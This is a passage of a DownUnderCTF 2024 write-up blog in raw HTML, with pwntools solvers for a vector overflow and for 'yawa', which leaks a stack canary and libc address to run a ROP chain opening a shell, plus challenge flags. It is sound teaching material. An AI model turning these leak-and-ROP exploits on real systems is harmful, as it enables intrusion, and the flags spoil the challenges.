    class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 612px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/eda4100b4cc79069e093f123fc482a0a/8c76f/image-20240706153424460.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 11.249999999999998%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfUlEQVQI12WNyw6CMBQFuylgxXiJSptIQ2QBCfIQEfD/f2zUbl1MZnXmqHNywKYnbHLESoz3F8qy5DlPDGNP09Q4Z8ltThxHKKXIMqHwxR9aa5SRK3tXY8QztZ40jb5jy2uZA7/wvWvp+g4RCcGqurG9V9ZtCR4fQzg3ZscHN3w1dBuMpL4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/eda4100b4cc79069e093f123fc482a0a/8ac56/image-20240706153424460.webp 240w,\n/static/eda4100b4cc79069e093f123fc482a0a/d3be9/image-20240706153424460.webp 480w,\n/static/eda4100b4cc79069e093f123fc482a0a/d1d8c/image-20240706153424460.webp 612w\"\n              sizes=\"(max-width: 612px) 100vw, 612px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/eda4100b4cc79069e093f123fc482a0a/8ff5a/image-20240706153424460.png 240w,\n/static/eda4100b4cc79069e093f123fc482a0a/e85cb/image-20240706153424460.png 480w,\n/static/eda4100b4cc79069e093f123fc482a0a/8c76f/image-20240706153424460.png 612w\"\n            sizes=\"(max-width: 612px) 100vw, 612px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/eda4100b4cc79069e093f123fc482a0a/8c76f/image-20240706153424460.png\"\n            alt=\"image-20240706153424460\"\n            title=\"image-20240706153424460\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So I used a buffer overflow to place, into the vector, a pointer to an address containing the string <code class=\"language-text\">DUCTF</code>, and then placed the address 5 bytes past that as the next address, thereby overriding the vector.</p>\n<p>You can get the flag by running the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">from pwn import <span class=\"token operator\">*</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Set context</span></span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Set target</span></span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./vector_overflow\"</span>\nexe <span class=\"token operator\">=</span> <span class=\"token function\">ELF</span><span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> <span class=\"token function\">remote</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"2024.ductf.dev\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30013</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Exploit</span></span>\npayload <span class=\"token operator\">=</span> b<span class=\"token string\">\"DUCTF\\x00\"</span> <span class=\"token operator\">+</span> b<span class=\"token string\">\"A\"</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token number\">16</span><span class=\"token operator\">-</span><span class=\"token number\">6</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token function\">p64</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x4051e0</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token function\">p64</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x4051e0</span><span class=\"token operator\">+</span><span class=\"token number\">5</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span><span class=\"token function\">sendline</span><span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span> <span class=\"token expression\">Finish exploit</span></span>\ntarget<span class=\"token punctuation\">.</span><span class=\"token function\">interactive</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span><span class=\"token function\">clean</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 851px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ddeb5daf0a775dfc3315d20bb392051e/0fcea/image-20240706153124754.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7ElEQVQoz5WQzW6EIACEEdSIWGQPq678Lqtxbfv+rzdF2qSXbRMPX4YQMswMUVeJ+DRwy4QQLdbtHfvHJx7rBuPv0C5gth434zBMM4abxqQtjLWwzmLWM4zR4JyDEAJSsgr7vqOuOK5jDR8FXGjQX+rvB2dpeIN7DGCshJIE00gxXAgGRsHTHSsTjGWtqipTpnNRFK8Nx2nAsi5w3sLPGtFYxKSbNQipkug6dAkp5Q9vmcP0paHTGr1SoJSCHL8mipSO0CKnOl15CT6lc3lYpfo0bgPRtr8jn+WRzGQyOuoIIdCKNuth+OdO//AFK6KcAFOCi9sAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ddeb5daf0a775dfc3315d20bb392051e/8ac56/image-20240706153124754.webp 240w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/d3be9/image-20240706153124754.webp 480w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/155dd/image-20240706153124754.webp 851w\"\n              sizes=\"(max-width: 851px) 100vw, 851px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ddeb5daf0a775dfc3315d20bb392051e/8ff5a/image-20240706153124754.png 240w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/e85cb/image-20240706153124754.png 480w,\n/static/ddeb5daf0a775dfc3315d20bb392051e/0fcea/image-20240706153124754.png 851w\"\n            sizes=\"(max-width: 851px) 100vw, 851px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ddeb5daf0a775dfc3315d20bb392051e/0fcea/image-20240706153124754.png\"\n            alt=\"image-20240706153124754\"\n            title=\"image-20240706153124754\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"yawapwn\" style=\"position:relative;\"><a href=\"#yawapwn\" aria-label=\"yawapwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>yawa(Pwn)</h2>\n<blockquote>\n<p>Yet another welcome application.</p>\n</blockquote>\n<p>The challenge provides an ELF file and a library file.</p>\n<p>When I decompiled the binary, I got the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined4 <span class=\"token function\">menu</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined4 local_14<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"1. Tell me your name\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"2. Get a personalised greeting\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">__isoc99_scanf</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>DAT_00102042<span class=\"token punctuation\">,</span><span class=\"token operator\">&amp;</span>local_14<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> local_14<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\nundefined8 <span class=\"token function\">main</span><span class=\"token punctuation\">(</span>EVP_PKEY_CTX <span class=\"token operator\">*</span>param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">int</span> iVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> in_FS_OFFSET<span class=\"token punctuation\">;</span>\n  undefined name <span class=\"token punctuation\">[</span><span class=\"token number\">88</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> local_10<span class=\"token punctuation\">;</span>\n  \n  local_10 <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">init</span><span class=\"token punctuation\">(</span>param_1<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">while</span><span class=\"token punctuation\">(</span> true <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">while</span><span class=\"token punctuation\">(</span> true <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n      iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">menu</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n      <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n      <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span>name<span class=\"token punctuation\">,</span><span class=\"token number\">0x88</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>iVar1 <span class=\"token operator\">!=</span> <span class=\"token number\">2</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">break</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, %s\\n\"</span><span class=\"token punctuation\">,</span>name<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Inside the <code class=\"language-text\">main</code> function, the program uses the <code class=\"language-text\">menu</code> function either to accept input for <code class=\"language-text\">name</code> or to print the saved <code class=\"language-text\">name</code>.</p>\n<p>Here, the <code class=\"language-text\">name</code> buffer is only <code class=\"language-text\">name[88]</code>, but the size read by <code class=\"language-text\">read</code> is <code class=\"language-text\">0x88</code> (136).</p>\n<p>Because of that, when printing <code class=\"language-text\">name</code>, you can leak information from the stack by crafting the input so that the NULL byte gets overwritten.</p>\n<p>By abusing this vulnerability to leak the Canary and the base address of libc, you can execute a ROP chain and get a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *(main+142)\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./yawa\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"2024.ductf.dev\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">30010</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Canary leak</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"1\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">88</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"2\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\nleaked_canary <span class=\"token operator\">=</span> r<span class=\"token punctuation\">[</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">88</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">88</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token operator\">+</span><span class=\"token number\">7</span><span class=\"token punctuation\">]</span>\nleaked_canary <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>leaked_canary<span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"00\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>leaked_canary<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># libc leak</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"1\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">103</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"2\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\nlibc_start_main_ret <span class=\"token operator\">=</span> <span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">[</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">103</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Hello, \"</span><span class=\"token punctuation\">)</span><span class=\"token operator\">+</span><span class=\"token number\">103</span><span class=\"token operator\">+</span><span class=\"token number\">1</span><span class=\"token operator\">+</span><span class=\"token number\">6</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nlibc_start_main_ret <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>libc_start_main_ret<span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>libc_start_main_ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Create payload(libc6_2.35-0ubuntu3.6_amd64)</span>\nlibc_base <span class=\"token operator\">=</span> libc_start_main_ret <span class=\"token operator\">-</span> <span class=\"token number\">0x29d90</span>\nlibc_system <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x50d70</span>\nbinsh <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\npop_rdi <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x1bbea1</span>\nret <span class=\"token operator\">=</span> libc_base <span class=\"token operator\">+</span> <span class=\"token number\">0x1bc065</span>\n\n<span class=\"token comment\"># Exploit</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"1\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x00\"</span><span class=\"token operator\">*</span><span class=\"token number\">88</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>leaked_canary<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>ret<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>pop_rdi<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>binsh<span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> p64<span class=\"token punctuation\">(</span>libc_system<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"3\"</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>I was able to get the flag by running the solver above.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 731px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d36c726d60ec854de64867059849868e/6e9ba/image-20240706210155860.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 55.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABc0lEQVQoz52SaVPCMBRF0w2alO5A0gK2yFLEVmUUtw/+/391fQnjCC7j8uFMXjrTk/duwspVirrL0exLrHcl6uUCq+0tmm6PedNidbnDurulusN802GxvcHl9Q5tu0VRFBiNhpBKIsszMMbAXKeHZr3BpJzB9znJatSNQrVUkHIE7vfR89x3ehoPruseBB+xbAvnizniOAazGYQ6wCX7+ocjLMsynArpQ11X4FzAdkiUMAQk4/nPwi9J0hAX2w1xgUKOUZUKaZYiGAjkeY6Mat19kiSIohBpmpq8hsMcSZpACHEqbK9aPD0/Gu4f9jT+uRFwzhEEAoNBQJn1TGYaz/OOcOE4zqlwpgooui19ou5GB6470ERRZLq1bfv3I1ezKc6qM0RxhDAMqTOfsrT/l59mSkJVKMooRr/fN3wa4y8sqTtJwrIsMB6P6C36Jj8dthBvq/j+3X3k5f4OxaSk/DKM6ZallObl69rsqZa06kN+I3wF+nP4xgqRwVoAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d36c726d60ec854de64867059849868e/8ac56/image-20240706210155860.webp 240w,\n/static/d36c726d60ec854de64867059849868e/d3be9/image-20240706210155860.webp 480w,\n/static/d36c726d60ec854de64867059849868e/feeb6/image-20240706210155860.webp 731w\"\n              sizes=\"(max-width: 731px) 100vw, 731px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d36c726d60ec854de64867059849868e/8ff5a/image-20240706210155860.png 240w,\n/static/d36c726d60ec854de64867059849868e/e85cb/image-20240706210155860.png 480w,\n/static/d36c726d60ec854de64867059849868e/6e9ba/image-20240706210155860.png 731w\"\n            sizes=\"(max-width: 731px) 100vw, 731px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d36c726d60ec854de64867059849868e/6e9ba/image-20240706210155860.png\"\n            alt=\"image-20240706210155860\"\n            title=\"image-20240706210155860\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"babys-first-forensicsforensic\" style=\"position:relative;\"><a href=\"#babys-first-forensicsforensic\" aria-label=\"babys first forensicsforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Baby’s First Forensics(Forensic)</h2>\n<blockquote>\n<p>They’ve been trying to breach our infrastructure all morning! They’re trying to get more info on our covert kangaroos! We need your help, we’ve captured some traffic of them attacking us, can you tell us what tool they were using and its version?</p>\n<p>NOTE: Wrap your answer in the DUCTF{}, e.g. DUCTF{nmap_7.25}</p>\n</blockquote>\n<p>You can identify the attack tool just by looking at an arbitrary received packet in the packet capture.</p>\n<p><code class=\"language-text\">DUCTF{Nikto_2.1.6}</code> was the correct flag.</p>\n<h2 id=\"sam-i-amforensic\" style=\"position:relative;\"><a href=\"#sam-i-amforensic\" aria-label=\"sam i amforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 